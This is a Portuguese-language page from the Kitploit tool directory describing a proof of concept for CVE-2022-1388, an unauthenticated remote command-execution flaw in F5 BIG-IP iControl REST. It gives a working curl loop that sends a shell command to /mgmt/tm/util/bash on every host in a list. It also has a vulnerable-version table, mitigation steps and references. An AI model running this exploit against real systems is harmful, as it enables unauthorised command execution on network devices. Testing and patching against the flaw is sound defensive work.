Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2022-1388 — PoC da vulnerabilidade CVE-2022-1388 do BIG-IP iControl REST | Kitploit
Ferramentas/GitHubGitHub/shamo0/cve-2022-1388
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e ControleRed Teaming
GitHubshamo0/cve-2022-1388

CVE-2022-1388

PoC da vulnerabilidade CVE-2022-1388 do BIG-IP iControl REST

Ver Repositório
1há 4 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Vulnerabilidade REST iControl do BIG-IP CVE-2022-1388 PoC

f5logo

Esta vulnerabilidade pode permitir que um atacante não autenticado com acesso de rede ao sistema BIG-IP através da porta de administração e/ou endereços IP próprios execute comandos arbitrários do sistema, crie ou exclua arquivos, ou desabilite serviços.

PoC

Você pode usar o seguinte comando curl de uma linha para verificar a vulnerabilidade F5 Big-IP ou usar o script python fornecido.

root@kitploit:~
cat ips.txt | while read ip; do curl -su admin -H "Content-Type: application/json" http://$ip/mgmt/tm/util/bash -d '{"command":"run","utilCmdArgs":"-c id"}';done

Versões Vulneráveis (Big-IP)

BranchVersões VulneráveisCorreções Introduzidas
11.x11.6.1-11.6.5Sem Correção
12.x12.1.0-12.1.6Sem Correção
13.x13.1.0-13.1.413.1.5
14.x14.1.0-14.1.414.1.4.6
15.x15.1.0-15.1.515.1.5.1
16.x16.1.0-16.1.216.1.2.2
17.xNenhuma17.0.0

Mitigação

  • Atualize para a versão corrigida na coluna ```Correções Introduzidas```. (Método Preferido)
  • Bloqueie o acesso iControl REST através do endereço IP próprio
  • Bloqueie o acesso iControl REST através da interface de administração
  • Modifique a configuração do httpd do BIG-IP

Para mais informações sobre mitigação, consulte as referências.

Referências

  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1388
  • https://support.f5.com/csp/article/K23605346
  • https://github.com/ZephrFish/F5-CVE-2022-1388-Exploit
Baixar ferramenta